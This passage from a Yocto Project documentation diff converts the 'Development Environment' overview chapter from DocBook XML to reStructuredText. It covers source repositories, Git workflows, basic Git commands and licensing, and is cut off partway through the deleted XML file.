+ multiple remote build servers.
+
+ For steps that show you how to set up your development host to use
+ Toaster and on how to use Toaster in general, see the
+ :doc:`../toaster-manual/toaster-manual`.
+
+.. _yocto-project-repositories:
+
+Yocto Project Source Repositories
+=================================
+
+The Yocto Project team maintains complete source repositories for all
+Yocto Project files at :yocto_git:`/`. This web-based source
+code browser is organized into categories by function such as IDE
+Plugins, Matchbox, Poky, Yocto Linux Kernel, and so forth. From the
+interface, you can click on any particular item in the "Name" column and
+see the URL at the bottom of the page that you need to clone a Git
+repository for that particular item. Having a local Git repository of
+the :term:`Source Directory`, which
+is usually named "poky", allows you to make changes, contribute to the
+history, and ultimately enhance the Yocto Project's tools, Board Support
+Packages, and so forth.
+
+For any supported release of Yocto Project, you can also go to the
+:yocto_home:`Yocto Project Website <>` and select the "DOWNLOADS"
+item from the "SOFTWARE" menu and get a released tarball of the ``poky``
+repository, any supported BSP tarball, or Yocto Project tools. Unpacking
+these tarballs gives you a snapshot of the released files.
+
+.. note::
+
+ - The recommended method for setting up the Yocto Project
+ :term:`Source Directory` and the files
+ for supported BSPs (e.g., ``meta-intel``) is to use `Git <#git>`__
+ to create a local copy of the upstream repositories.
+
+ - Be sure to always work in matching branches for both the selected
+ BSP repository and the Source Directory (i.e. ``poky``)
+ repository. For example, if you have checked out the "master"
+ branch of ``poky`` and you are going to use ``meta-intel``, be
+ sure to checkout the "master" branch of ``meta-intel``.
+
+In summary, here is where you can get the project files needed for
+development:
+
+- :yocto_git:`Source Repositories: <>` This area contains IDE
+ Plugins, Matchbox, Poky, Poky Support, Tools, Yocto Linux Kernel, and
+ Yocto Metadata Layers. You can create local copies of Git
+ repositories for each of these areas.
+
+ .. image:: figures/source-repos.png
+ :align: center
+
+ For steps on how to view and access these upstream Git repositories,
+ see the ":ref:`dev-manual/dev-manual-start:accessing source repositories`"
+ Section in the Yocto Project Development Tasks Manual.
+
+- :yocto_dl:`Index of /releases: </releases>` This is an index
+ of releases such as Poky, Pseudo, installers for cross-development
+ toolchains, miscellaneous support and all released versions of Yocto
+ Project in the form of images or tarballs. Downloading and extracting
+ these files does not produce a local copy of the Git repository but
+ rather a snapshot of a particular release or image.
+
+ .. image:: figures/index-downloads.png
+ :align: center
+
+ For steps on how to view and access these files, see the
+ ":ref:`dev-manual/dev-manual-start:accessing index of releases`"
+ section in the Yocto Project Development Tasks Manual.
+
+- *"DOWNLOADS" page for the* :yocto_home:`Yocto Project Website <>` *:*
+
+ The Yocto Project website includes a "DOWNLOADS" page accessible
+ through the "SOFTWARE" menu that allows you to download any Yocto
+ Project release, tool, and Board Support Package (BSP) in tarball
+ form. The tarballs are similar to those found in the
+ :yocto_dl:`Index of /releases: </releases>` area.
+
+ .. image:: figures/yp-download.png
+ :align: center
+
+ For steps on how to use the "DOWNLOADS" page, see the
+ ":ref:`dev-manual/dev-manual-start:using the downloads page`"
+ section in the Yocto Project Development Tasks Manual.
+
+.. _gs-git-workflows-and-the-yocto-project:
+
+Git Workflows and the Yocto Project
+===================================
+
+Developing using the Yocto Project likely requires the use of
+`Git <#git>`__. Git is a free, open source distributed version control
+system used as part of many collaborative design environments. This
+section provides workflow concepts using the Yocto Project and Git. In
+particular, the information covers basic practices that describe roles
+and actions in a collaborative development environment.
+
+.. note::
+
+ If you are familiar with this type of development environment, you
+ might not want to read this section.
+
+The Yocto Project files are maintained using Git in "branches" whose Git
+histories track every change and whose structures provide branches for
+all diverging functionality. Although there is no need to use Git, many
+open source projects do so.
+
+For the Yocto Project, a key individual called the "maintainer" is
+responsible for the integrity of the "master" branch of a given Git
+repository. The "master" branch is the "upstream" repository from which
+final or most recent builds of a project occur. The maintainer is
+responsible for accepting changes from other developers and for
+organizing the underlying branch structure to reflect release strategies
+and so forth.
+
+.. note::
+
+ For information on finding out who is responsible for (maintains) a
+ particular area of code in the Yocto Project, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:submitting a change to the yocto project`"
+ section of the Yocto Project Development Tasks Manual.
+
+The Yocto Project ``poky`` Git repository also has an upstream
+contribution Git repository named ``poky-contrib``. You can see all the
+branches in this repository using the web interface of the
+:yocto_git:`Source Repositories <>` organized within the "Poky Support"
+area. These branches hold changes (commits) to the project that have
+been submitted or committed by the Yocto Project development team and by
+community members who contribute to the project. The maintainer
+determines if the changes are qualified to be moved from the "contrib"
+branches into the "master" branch of the Git repository.
+
+Developers (including contributing community members) create and
+maintain cloned repositories of upstream branches. The cloned
+repositories are local to their development platforms and are used to
+develop changes. When a developer is satisfied with a particular feature
+or change, they "push" the change to the appropriate "contrib"
+repository.
+
+Developers are responsible for keeping their local repository up-to-date
+with whatever upstream branch they are working against. They are also
+responsible for straightening out any conflicts that might arise within
+files that are being worked on simultaneously by more than one person.
+All this work is done locally on the development host before anything is
+pushed to a "contrib" area and examined at the maintainer's level.
+
+A somewhat formal method exists by which developers commit changes and
+push them into the "contrib" area and subsequently request that the
+maintainer include them into an upstream branch. This process is called
+"submitting a patch" or "submitting a change." For information on
+submitting patches and changes, see the
+":ref:`dev-manual/dev-manual-common-tasks:submitting a change to the yocto project`"
+section in the Yocto Project Development Tasks Manual.
+
+In summary, a single point of entry exists for changes into a "master"
+or development branch of the Git repository, which is controlled by the
+project's maintainer. And, a set of developers exist who independently
+develop, test, and submit changes to "contrib" areas for the maintainer
+to examine. The maintainer then chooses which changes are going to
+become a permanent part of the project.
+
+.. image:: figures/git-workflow.png
+ :align: center
+
+While each development environment is unique, there are some best
+practices or methods that help development run smoothly. The following
+list describes some of these practices. For more information about Git
+workflows, see the workflow topics in the `Git Community
+Book <http://book.git-scm.com>`__.
+
+- *Make Small Changes:* It is best to keep the changes you commit small
+ as compared to bundling many disparate changes into a single commit.
+ This practice not only keeps things manageable but also allows the
+ maintainer to more easily include or refuse changes.
+
+- *Make Complete Changes:* It is also good practice to leave the
+ repository in a state that allows you to still successfully build
+ your project. In other words, do not commit half of a feature, then
+ add the other half as a separate, later commit. Each commit should
+ take you from one buildable project state to another buildable state.
+
+- *Use Branches Liberally:* It is very easy to create, use, and delete
+ local branches in your working Git repository on the development
+ host. You can name these branches anything you like. It is helpful to
+ give them names associated with the particular feature or change on
+ which you are working. Once you are done with a feature or change and
+ have merged it into your local master branch, simply discard the
+ temporary branch.
+
+- *Merge Changes:* The ``git merge`` command allows you to take the
+ changes from one branch and fold them into another branch. This
+ process is especially helpful when more than a single developer might
+ be working on different parts of the same feature. Merging changes
+ also automatically identifies any collisions or "conflicts" that
+ might happen as a result of the same lines of code being altered by
+ two different developers.
+
+- *Manage Branches:* Because branches are easy to use, you should use a
+ system where branches indicate varying levels of code readiness. For
+ example, you can have a "work" branch to develop in, a "test" branch
+ where the code or change is tested, a "stage" branch where changes
+ are ready to be committed, and so forth. As your project develops,
+ you can merge code across the branches to reflect ever-increasing
+ stable states of the development.
+
+- *Use Push and Pull:* The push-pull workflow is based on the concept
+ of developers "pushing" local commits to a remote repository, which
+ is usually a contribution repository. This workflow is also based on
+ developers "pulling" known states of the project down into their
+ local development repositories. The workflow easily allows you to
+ pull changes submitted by other developers from the upstream
+ repository into your work area ensuring that you have the most recent
+ software on which to develop. The Yocto Project has two scripts named
+ ``create-pull-request`` and ``send-pull-request`` that ship with the
+ release to facilitate this workflow. You can find these scripts in
+ the ``scripts`` folder of the
+ :term:`Source Directory`. For information
+ on how to use these scripts, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:using scripts to push a change upstream and request a pull`"
+ section in the Yocto Project Development Tasks Manual.
+
+- *Patch Workflow:* This workflow allows you to notify the maintainer
+ through an email that you have a change (or patch) you would like
+ considered for the "master" branch of the Git repository. To send
+ this type of change, you format the patch and then send the email
+ using the Git commands ``git format-patch`` and ``git send-email``.
+ For information on how to use these scripts, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:submitting a change to the yocto project`"
+ section in the Yocto Project Development Tasks Manual.
+
+Git
+===
+
+The Yocto Project makes extensive use of Git, which is a free, open
+source distributed version control system. Git supports distributed
+development, non-linear development, and can handle large projects. It
+is best that you have some fundamental understanding of how Git tracks
+projects and how to work with Git if you are going to use the Yocto
+Project for development. This section provides a quick overview of how
+Git works and provides you with a summary of some essential Git
+commands.
+
+.. note::
+
+ - For more information on Git, see
+ http://git-scm.com/documentation.
+
+ - If you need to download Git, it is recommended that you add Git to
+ your system through your distribution's "software store" (e.g. for
+ Ubuntu, use the Ubuntu Software feature). For the Git download
+ page, see http://git-scm.com/download.
+
+ - For information beyond the introductory nature in this section,
+ see the ":ref:`dev-manual/dev-manual-start:locating yocto project source files`"
+ section in the Yocto Project Development Tasks Manual.
+
+Repositories, Tags, and Branches
+--------------------------------
+
+As mentioned briefly in the previous section and also in the "`Git
+Workflows and the Yocto
+Project <#gs-git-workflows-and-the-yocto-project>`__" section, the Yocto
+Project maintains source repositories at :yocto_git:`/`. If you
+look at this web-interface of the repositories, each item is a separate
+Git repository.
+
+Git repositories use branching techniques that track content change (not
+files) within a project (e.g. a new feature or updated documentation).
+Creating a tree-like structure based on project divergence allows for
+excellent historical information over the life of a project. This
+methodology also allows for an environment from which you can do lots of
+local experimentation on projects as you develop changes or new
+features.
+
+A Git repository represents all development efforts for a given project.
+For example, the Git repository ``poky`` contains all changes and
+developments for that repository over the course of its entire life.
+That means that all changes that make up all releases are captured. The
+repository maintains a complete history of changes.
+
+You can create a local copy of any repository by "cloning" it with the
+``git clone`` command. When you clone a Git repository, you end up with
+an identical copy of the repository on your development system. Once you
+have a local copy of a repository, you can take steps to develop
+locally. For examples on how to clone Git repositories, see the
+":ref:`dev-manual/dev-manual-start:locating yocto project source files`"
+section in the Yocto Project Development Tasks Manual.
+
+It is important to understand that Git tracks content change and not
+files. Git uses "branches" to organize different development efforts.
+For example, the ``poky`` repository has several branches that include
+the current "&DISTRO_NAME_NO_CAP;" branch, the "master" branch, and many
+branches for past Yocto Project releases. You can see all the branches
+by going to :yocto_git:`/cgit.cgi/poky/` and clicking on the
+``[...]`` link beneath the "Branch" heading.
+
+Each of these branches represents a specific area of development. The
+"master" branch represents the current or most recent development. All
+other branches represent offshoots of the "master" branch.
+
+When you create a local copy of a Git repository, the copy has the same
+set of branches as the original. This means you can use Git to create a
+local working area (also called a branch) that tracks a specific
+development branch from the upstream source Git repository. in other
+words, you can define your local Git environment to work on any
+development branch in the repository. To help illustrate, consider the
+following example Git commands:
+::
+
+ $ cd ~
+ $ git clone git://git.yoctoproject.org/poky
+ $ cd poky
+ $ git checkout -b &DISTRO_NAME_NO_CAP; origin/&DISTRO_NAME_NO_CAP;
+
+In the previous example
+after moving to the home directory, the ``git clone`` command creates a
+local copy of the upstream ``poky`` Git repository. By default, Git
+checks out the "master" branch for your work. After changing the working
+directory to the new local repository (i.e. ``poky``), the
+``git checkout`` command creates and checks out a local branch named
+"&DISTRO_NAME_NO_CAP;", which tracks the upstream
+"origin/&DISTRO_NAME_NO_CAP;" branch. Changes you make while in this
+branch would ultimately affect the upstream "&DISTRO_NAME_NO_CAP;" branch
+of the ``poky`` repository.
+
+It is important to understand that when you create and checkout a local
+working branch based on a branch name, your local environment matches
+the "tip" of that particular development branch at the time you created
+your local branch, which could be different from the files in the
+"master" branch of the upstream repository. In other words, creating and
+checking out a local branch based on the "&DISTRO_NAME_NO_CAP;" branch
+name is not the same as checking out the "master" branch in the
+repository. Keep reading to see how you create a local snapshot of a
+Yocto Project Release.
+
+Git uses "tags" to mark specific changes in a repository branch
+structure. Typically, a tag is used to mark a special point such as the
+final change (or commit) before a project is released. You can see the
+tags used with the ``poky`` Git repository by going to
+:yocto_git:`/cgit.cgi/poky/` and clicking on the ``[...]`` link
+beneath the "Tag" heading.
+
+Some key tags for the ``poky`` repository are ``jethro-14.0.3``,
+``morty-16.0.1``, ``pyro-17.0.0``, and
+``&DISTRO_NAME_NO_CAP;-&POKYVERSION;``. These tags represent Yocto Project
+releases.
+
+When you create a local copy of the Git repository, you also have access
+to all the tags in the upstream repository. Similar to branches, you can
+create and checkout a local working Git branch based on a tag name. When
+you do this, you get a snapshot of the Git repository that reflects the
+state of the files when the change was made associated with that tag.
+The most common use is to checkout a working branch that matches a
+specific Yocto Project release. Here is an example:
+::
+
+ $ cd ~
+ $ git clone git://git.yoctoproject.org/poky
+ $ cd poky
+ $ git fetch --tags
+ $ git checkout tags/rocko-18.0.0 -b my_rocko-18.0.0
+
+In this example, the name
+of the top-level directory of your local Yocto Project repository is
+``poky``. After moving to the ``poky`` directory, the ``git fetch``
+command makes all the upstream tags available locally in your
+repository. Finally, the ``git checkout`` command creates and checks out
+a branch named "my-rocko-18.0.0" that is based on the upstream branch
+whose "HEAD" matches the commit in the repository associated with the
+"rocko-18.0.0" tag. The files in your repository now exactly match that
+particular Yocto Project release as it is tagged in the upstream Git
+repository. It is important to understand that when you create and
+checkout a local working branch based on a tag, your environment matches
+a specific point in time and not the entire development branch (i.e.
+from the "tip" of the branch backwards).
+
+Basic Commands
+--------------
+
+Git has an extensive set of commands that lets you manage changes and
+perform collaboration over the life of a project. Conveniently though,
+you can manage with a small set of basic operations and workflows once
+you understand the basic philosophy behind Git. You do not have to be an
+expert in Git to be functional. A good place to look for instruction on
+a minimal set of Git commands is
+`here <http://git-scm.com/documentation>`__.
+
+The following list of Git commands briefly describes some basic Git
+operations as a way to get started. As with any set of commands, this
+list (in most cases) simply shows the base command and omits the many
+arguments it supports. See the Git documentation for complete
+descriptions and strategies on how to use these commands:
+
+- *git init:* Initializes an empty Git repository. You cannot use
+ Git commands unless you have a ``.git`` repository.
+
+- *git clone:* Creates a local clone of a Git repository that is on
+ equal footing with a fellow developer's Git repository or an upstream
+ repository.
+
+- *git add:* Locally stages updated file contents to the index that
+ Git uses to track changes. You must stage all files that have changed
+ before you can commit them.
+
+- *git commit:* Creates a local "commit" that documents the changes
+ you made. Only changes that have been staged can be committed.
+ Commits are used for historical purposes, for determining if a
+ maintainer of a project will allow the change, and for ultimately
+ pushing the change from your local Git repository into the project's
+ upstream repository.
+
+- *git status:* Reports any modified files that possibly need to be
+ staged and gives you a status of where you stand regarding local
+ commits as compared to the upstream repository.
+
+- *git checkout branch-name:* Changes your local working branch and
+ in this form assumes the local branch already exists. This command is
+ analogous to "cd".
+
+- *git checkout –b working-branch upstream-branch:* Creates and
+ checks out a working branch on your local machine. The local branch
+ tracks the upstream branch. You can use your local branch to isolate
+ your work. It is a good idea to use local branches when adding
+ specific features or changes. Using isolated branches facilitates
+ easy removal of changes if they do not work out.
+
+- *git branch:* Displays the existing local branches associated
+ with your local repository. The branch that you have currently
+ checked out is noted with an asterisk character.
+
+- *git branch -D branch-name:* Deletes an existing local branch.
+ You need to be in a local branch other than the one you are deleting
+ in order to delete branch-name.
+
+- *git pull --rebase:* Retrieves information from an upstream Git
+ repository and places it in your local Git repository. You use this
+ command to make sure you are synchronized with the repository from
+ which you are basing changes (.e.g. the "master" branch). The
+ "--rebase" option ensures that any local commits you have in your
+ branch are preserved at the top of your local branch.
+
+- *git push repo-name local-branch:upstream-branch:* Sends
+ all your committed local changes to the upstream Git repository that
+ your local repository is tracking (e.g. a contribution repository).
+ The maintainer of the project draws from these repositories to merge
+ changes (commits) into the appropriate branch of project's upstream
+ repository.
+
+- *git merge:* Combines or adds changes from one local branch of
+ your repository with another branch. When you create a local Git
+ repository, the default branch is named "master". A typical workflow
+ is to create a temporary branch that is based off "master" that you
+ would use for isolated work. You would make your changes in that
+ isolated branch, stage and commit them locally, switch to the
+ "master" branch, and then use the ``git merge`` command to apply the
+ changes from your isolated branch into the currently checked out
+ branch (e.g. "master"). After the merge is complete and if you are
+ done with working in that isolated branch, you can safely delete the
+ isolated branch.
+
+- *git cherry-pick commits:* Choose and apply specific commits from
+ one branch into another branch. There are times when you might not be
+ able to merge all the changes in one branch with another but need to
+ pick out certain ones.
+
+- *gitk:* Provides a GUI view of the branches and changes in your
+ local Git repository. This command is a good way to graphically see
+ where things have diverged in your local repository.
+
+ .. note::
+
+ You need to install the
+ gitk
+ package on your development system to use this command.
+
+- *git log:* Reports a history of your commits to the repository.
+ This report lists all commits regardless of whether you have pushed
+ them upstream or not.
+
+- *git diff:* Displays line-by-line differences between a local
+ working file and the same file as understood by Git. This command is
+ useful to see what you have changed in any given file.
+
+Licensing
+=========
+
+Because open source projects are open to the public, they have different
+licensing structures in place. License evolution for both Open Source
+and Free Software has an interesting history. If you are interested in
+this history, you can find basic information here:
+
+- `Open source license
+ history <http://en.wikipedia.org/wiki/Open-source_license>`__
+
+- `Free software license
+ history <http://en.wikipedia.org/wiki/Free_software_license>`__
+
+In general, the Yocto Project is broadly licensed under the
+Massachusetts Institute of Technology (MIT) License. MIT licensing
+permits the reuse of software within proprietary software as long as the
+license is distributed with that software. MIT is also compatible with
+the GNU General Public License (GPL). Patches to the Yocto Project
+follow the upstream licensing scheme. You can find information on the
+MIT license
+`here <http://www.opensource.org/licenses/mit-license.php>`__. You can
+find information on the GNU GPL
+`here <http://www.opensource.org/licenses/LGPL-3.0>`__.
+
+When you build an image using the Yocto Project, the build process uses
+a known list of licenses to ensure compliance. You can find this list in
+the :term:`Source Directory` at
+``meta/files/common-licenses``. Once the build completes, the list of
+all licenses found and used during that build are kept in the
+:term:`Build Directory` at
+``tmp/deploy/licenses``.
+
+If a module requires a license that is not in the base list, the build
+process generates a warning during the build. These tools make it easier
+for a developer to be certain of the licenses with which their shipped
+products must comply. However, even with these tools it is still up to
+the developer to resolve potential licensing issues.
+
+The base list of licenses used by the build process is a combination of
+the Software Package Data Exchange (SPDX) list and the Open Source
+Initiative (OSI) projects. `SPDX Group <http://spdx.org>`__ is a working
+group of the Linux Foundation that maintains a specification for a
+standard format for communicating the components, licenses, and
+copyrights associated with a software package.
+`OSI <http://opensource.org>`__ is a corporation dedicated to the Open
+Source Definition and the effort for reviewing and approving licenses
+that conform to the Open Source Definition (OSD).
+
+You can find a list of the combined SPDX and OSI licenses that the Yocto
+Project uses in the ``meta/files/common-licenses`` directory in your
+:term:`Source Directory`.
+
+For information that can help you maintain compliance with various open
+source licensing during the lifecycle of a product created using the
+Yocto Project, see the
+":ref:`dev-manual/dev-manual-common-tasks:maintaining open source license compliance during your product's lifecycle`"
+section in the Yocto Project Development Tasks Manual.
diff --git a/documentation/overview-manual/overview-manual-development-environment.xml b/documentation/overview-manual/overview-manual-development-environment.xml
deleted file mode 100644
index 36ebf8a321..0000000000
--- a/documentation/overview-manual/overview-manual-development-environment.xml
+++ /dev/null
@@ -1,953 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='overview-development-environment'>
-<title>The Yocto Project Development Environment</title>
-
-<para>
- This chapter takes a look at the Yocto Project development
- environment.
- The chapter provides Yocto Project Development environment concepts that
- help you understand how work is accomplished in an open source environment,
- which is very different as compared to work accomplished in a closed,
- proprietary environment.
-</para>
-
-<para>
- Specifically, this chapter addresses open source philosophy, source
- repositories, workflows, Git, and licensing.
-</para>
-
-<section id='open-source-philosophy'>
- <title>Open Source Philosophy</title>
-
- <para>
- Open source philosophy is characterized by software development
- directed by peer production and collaboration through an active
- community of developers.
- Contrast this to the more standard centralized development models
- used by commercial software companies where a finite set of developers
- produces a product for sale using a defined set of procedures that
- ultimately result in an end product whose architecture and source
- material are closed to the public.
- </para>
-
- <para>
- Open source projects conceptually have differing concurrent agendas,
- approaches, and production.
- These facets of the development process can come from anyone in the
- public (community) who has a stake in the software project.
- The open source environment contains new copyright, licensing, domain,
- and consumer issues that differ from the more traditional development
- environment.
- In an open source environment, the end product, source material,
- and documentation are all available to the public at no cost.
- </para>
-
- <para>
- A benchmark example of an open source project is the Linux kernel,
- which was initially conceived and created by Finnish computer science
- student Linus Torvalds in 1991.
- Conversely, a good example of a non-open source project is the
- <trademark class='registered'>Windows</trademark> family of operating
- systems developed by
- <trademark class='registered'>Microsoft</trademark> Corporation.
- </para>
-
- <para>
- Wikipedia has a good historical description of the Open Source
- Philosophy
- <ulink url='http://en.wikipedia.org/wiki/Open_source'>here</ulink>.
- You can also find helpful information on how to participate in the
- Linux Community
- <ulink url='http://ldn.linuxfoundation.org/book/how-participate-linux-community'>here</ulink>.
- </para>
-</section>
-
-<section id='gs-the-development-host'>
- <title>The Development Host</title>
-
- <para>
- A development host or
- <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>build host</ulink>
- is key to using the Yocto Project.
- Because the goal of the Yocto Project is to develop images or
- applications that run on embedded hardware, development of those
- images and applications generally takes place on a system not
- intended to run the software - the development host.
- </para>
-
- <para>
- You need to set up a development host in order to use it with the
- Yocto Project.
- Most find that it is best to have a native Linux machine function as
- the development host.
- However, it is possible to use a system that does not run Linux
- as its operating system as your development host.
- When you have a Mac or Windows-based system, you can set it up
- as the development host by using
- <ulink url='https://github.com/crops/poky-container'>CROPS</ulink>,
- which leverages
- <ulink url='https://www.docker.com/'>Docker Containers</ulink>.
- Once you take the steps to set up a CROPS machine, you effectively
- have access to a shell environment that is similar to what you see
- when using a Linux-based development host.
- For the steps needed to set up a system using CROPS, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#setting-up-to-use-crops'>Setting Up to Use CROss PlatformS (CROPS)</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
-
- <para>
- If your development host is going to be a system that runs a Linux
- distribution, steps still exist that you must take to prepare the
- system for use with the Yocto Project.
- You need to be sure that the Linux distribution on the system is
- one that supports the Yocto Project.
- You also need to be sure that the correct set of host packages are
- installed that allow development using the Yocto Project.
- For the steps needed to set up a development host that runs Linux,
- see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#setting-up-a-native-linux-host'>Setting Up a Native Linux Host</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
-
- <para>
- Once your development host is set up to use the Yocto Project,
- several methods exist for you to do work in the Yocto Project
- environment:
- <itemizedlist>
- <listitem><para>
- <emphasis>Command Lines, BitBake, and Shells:</emphasis>
- Traditional development in the Yocto Project involves using the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>,
- which uses BitBake, in a command-line environment from a shell
- on your development host.
- You can accomplish this from a host that is a native Linux
- machine or from a host that has been set up with CROPS.
- Either way, you create, modify, and build images and
- applications all within a shell-based environment using
- components and tools available through your Linux distribution
- and the Yocto Project.</para>
-
- <para>For a general flow of the build procedures, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-building-a-simple-image'>Building a Simple Image</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para></listitem>
- <listitem><para>
- <emphasis>Board Support Package (BSP) Development:</emphasis>
- Development of BSPs involves using the Yocto Project to
- create and test layers that allow easy development of
- images and applications targeted for specific hardware.
- To development BSPs, you need to take some additional steps
- beyond what was described in setting up a development host.
- </para>
-
- <para>The
- <ulink url='&YOCTO_DOCS_BSP_URL;'>Yocto Project Board Support Package (BSP) Developer's Guide</ulink>
- provides BSP-related development information.
- For specifics on development host preparation, see the
- "<ulink url='&YOCTO_DOCS_BSP_URL;#preparing-your-build-host-to-work-with-bsp-layers'>Preparing Your Build Host to Work With BSP Layers</ulink>"
- section in the Yocto Project Board Support Package (BSP)
- Developer's Guide.
- </para></listitem>
- <listitem><para>
- <emphasis>Kernel Development:</emphasis>
- If you are going to be developing kernels using the Yocto
- Project you likely will be using <filename>devtool</filename>.
- A workflow using <filename>devtool</filename> makes kernel
- development quicker by reducing iteration cycle times.</para>
-
- <para>The
- <ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;'>Yocto Project Linux Kernel Development Manual</ulink>
- provides kernel-related development information.
- For specifics on development host preparation, see the
- "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#preparing-the-build-host-to-work-on-the-kernel'>Preparing the Build Host to Work on the Kernel</ulink>"
- section in the Yocto Project Linux Kernel Development Manual.
- </para></listitem>
- <listitem><para>
- <emphasis>Using Toaster:</emphasis>
- The other Yocto Project development method that involves an
- interface that effectively puts the Yocto Project into the
- background is Toaster.
- Toaster provides an interface to the OpenEmbedded build system.
- The interface enables you to configure and run your builds.
- Information about builds is collected and stored in a database.
- You can use Toaster to configure and start builds on multiple
- remote build servers.</para>
-
- <para>For steps that show you how to set up your development
- host to use Toaster and on how to use Toaster in general,
- see the
- <ulink url='&YOCTO_DOCS_TOAST_URL;'>Toaster User Manual</ulink>.
- </para></listitem>
- </itemizedlist>
- </para>
-</section>
-
-<section id='yocto-project-repositories'>
- <title>Yocto Project Source Repositories</title>
-
- <para>
- The Yocto Project team maintains complete source repositories for all
- Yocto Project files at
- <ulink url='&YOCTO_GIT_URL;'></ulink>.
- This web-based source code browser is organized into categories by
- function such as IDE Plugins, Matchbox, Poky, Yocto Linux Kernel, and
- so forth.
- From the interface, you can click on any particular item in the "Name"
- column and see the URL at the bottom of the page that you need to clone
- a Git repository for that particular item.
- Having a local Git repository of the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>,
- which is usually named "poky", allows
- you to make changes, contribute to the history, and ultimately enhance
- the Yocto Project's tools, Board Support Packages, and so forth.
- </para>
-
- <para>
- For any supported release of Yocto Project, you can also go to the
- <ulink url='&YOCTO_HOME_URL;'>Yocto Project Website</ulink> and
- select the "DOWNLOADS" item from the "SOFTWARE" menu and get a
- released tarball of the <filename>poky</filename> repository, any
- supported BSP tarball, or Yocto Project tools.
- Unpacking these tarballs gives you a snapshot of the released
- files.
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- The recommended method for setting up the Yocto Project
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- and the files for supported BSPs
- (e.g., <filename>meta-intel</filename>) is to use
- <link linkend='git'>Git</link> to create a local copy of
- the upstream repositories.
- </para></listitem>
- <listitem><para>
- Be sure to always work in matching branches for both
- the selected BSP repository and the Source Directory
- (i.e. <filename>poky</filename>) repository.
- For example, if you have checked out the "master" branch
- of <filename>poky</filename> and you are going to use
- <filename>meta-intel</filename>, be sure to checkout the
- "master" branch of <filename>meta-intel</filename>.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-
- <para>
- In summary, here is where you can get the project files needed for
- development:
- <itemizedlist>
- <listitem><para id='source-repositories'>
- <emphasis>
- <ulink url='&YOCTO_GIT_URL;'>Source Repositories:</ulink>
- </emphasis>
- This area contains IDE Plugins, Matchbox, Poky, Poky Support,
- Tools, Yocto Linux Kernel, and Yocto Metadata Layers.
- You can create local copies of Git repositories for each of
- these areas.</para>
-
- <para>
- <imagedata fileref="figures/source-repos.png" align="center" width="6in" depth="4in" />
- For steps on how to view and access these upstream Git
- repositories, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#accessing-source-repositories'>Accessing Source Repositories</ulink>"
- Section in the Yocto Project Development Tasks Manual.
- </para></listitem>
- <listitem><para><anchor id='index-downloads' />
- <emphasis>
- <ulink url='&YOCTO_DL_URL;/releases/'>Index of /releases:</ulink>
- </emphasis>
- This is an index of releases such as Poky, Pseudo, installers
- for cross-development toolchains, miscellaneous support
- and all released versions of Yocto Project in the form of
- images or tarballs.
- Downloading and extracting these files does not produce a local
- copy of the Git repository but rather a snapshot of a
- particular release or image.</para>
-
- <para>
- <imagedata fileref="figures/index-downloads.png" align="center" width="6in" depth="3.5in" />
- For steps on how to view and access these files, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#accessing-index-of-releases'>Accessing Index of Releases</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para></listitem>
- <listitem><para id='downloads-page'>
- <emphasis>"DOWNLOADS" page for the
- <ulink url='&YOCTO_HOME_URL;'>Yocto Project Website</ulink>:
- </emphasis></para>
-
- <para>The Yocto Project website includes a "DOWNLOADS" page
- accessible through the "SOFTWARE" menu that allows you to
- download any Yocto Project release, tool, and Board Support
- Package (BSP) in tarball form.
- The tarballs are similar to those found in the
- <ulink url='&YOCTO_DL_URL;/releases/'>Index of /releases:</ulink>
- area.</para>
-
- <para>
- <imagedata fileref="figures/yp-download.png" align="center" width="6in" depth="4in" />
- For steps on how to use the "DOWNLOADS" page, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#using-the-downloads-page'>Using the Downloads Page</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para></listitem>
- </itemizedlist>
- </para>
-</section>
-
-<section id='gs-git-workflows-and-the-yocto-project'>
- <title>Git Workflows and the Yocto Project</title>
-
- <para>
- Developing using the Yocto Project likely requires the use of
- <link linkend='git'>Git</link>.
- Git is a free, open source distributed version control system
- used as part of many collaborative design environments.
- This section provides workflow concepts using the Yocto Project and
- Git.
- In particular, the information covers basic practices that describe
- roles and actions in a collaborative development environment.
- <note>
- If you are familiar with this type of development environment, you
- might not want to read this section.
- </note>
- </para>
-
- <para>
- The Yocto Project files are maintained using Git in "branches"
- whose Git histories track every change and whose structures
- provide branches for all diverging functionality.
- Although there is no need to use Git, many open source projects do so.
- <para>
-
- </para>
- For the Yocto Project, a key individual called the "maintainer" is
- responsible for the integrity of the "master" branch of a given Git
- repository.
- The "master" branch is the “upstream†repository from which final or
- most recent builds of a project occur.
- The maintainer is responsible for accepting changes from other
- developers and for organizing the underlying branch structure to
- reflect release strategies and so forth.
- <note>
- For information on finding out who is responsible for (maintains)
- a particular area of code in the Yocto Project, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#how-to-submit-a-change'>Submitting a Change to the Yocto Project</ulink>"
- section of the Yocto Project Development Tasks Manual.
- </note>
- </para>
-
- <para>
- The Yocto Project <filename>poky</filename> Git repository also has an
- upstream contribution Git repository named
- <filename>poky-contrib</filename>.
- You can see all the branches in this repository using the web interface
- of the
